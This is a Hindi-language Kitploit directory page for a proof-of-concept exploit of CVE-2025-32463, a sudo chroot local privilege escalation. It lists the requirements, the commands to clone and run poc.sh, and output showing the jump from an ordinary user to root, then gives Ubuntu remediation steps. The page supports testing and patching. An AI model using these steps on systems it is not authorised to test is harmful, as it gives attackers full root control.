Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32463 — CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo संस्करण 1.9.14-1.9.17 में एक स्थानीय विशेषाधिकार वृद्धि, पूर्व-संकलित लाइब्रेरी और उपचार निर्देशों के साथ। | Kitploit
उपकरण/GitHubGitHub/khoazero123/cve-2025-32463
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षा
GitHubkhoazero123/cve-2025-32463

CVE-2025-32463

CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo संस्करण 1.9.14-1.9.17 में एक स्थानीय विशेषाधिकार वृद्धि, पूर्व-संकलित लाइब्रेरी और उपचार निर्देशों के साथ।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32463 – Sudo EoP एक्सप्लॉइट (PoC) पूर्व-संकलित लाइब्रेरी के साथ

इस रिपॉजिटरी में CVE-2025-32463 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट शामिल है, जो sudo में एक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) भेद्यता है, जिसे रिच मिर्च (Rich Mirch) द्वारा खोजा गया था।

क्रेडिट

https://github.com/kh4sh3i/CVE-2025-32463

⚠️ अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। इस कोड का उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके मूल्यांकन के लिए आपके पास स्पष्ट अनुमति नहीं है।


🔧 आवश्यकताएँ

  • chroot समर्थन (-R) के साथ sudo: संस्करण 1.9.14 से 1.9.17
  • nsswitch सक्षम होना चाहिए

🚀 PoC कैसे चलाएं

root@kitploit:~
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463

जाँचें कि क्या वर्तमान उपयोगकर्ता के पास कम विशेषाधिकार हैं

root@kitploit:~
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)

आवश्यकताओं की जाँच करें

root@kitploit:~
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf

एक्सप्लॉइट चलाएं

root@kitploit:~
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)

🚒 Ubuntu 24.04 LTS पर उपचार

  • कनेक्टेड सिस्टम के लिए बस चलाएं

    root@kitploit:~
    sudo apt update && sudo apt upgrade
    
  • एयर-गैप्ड सिस्टम के लिए: आप नवीनतम sudo पैकेज यहाँ से प्राप्त कर सकते हैं: https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb। एक बार पैकेज को लक्षित सिस्टम पर स्थानांतरित कर दिया जाए, तो बस चलाएं:

    root@kitploit:~
     sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb
    
टूल डाउनलोड करें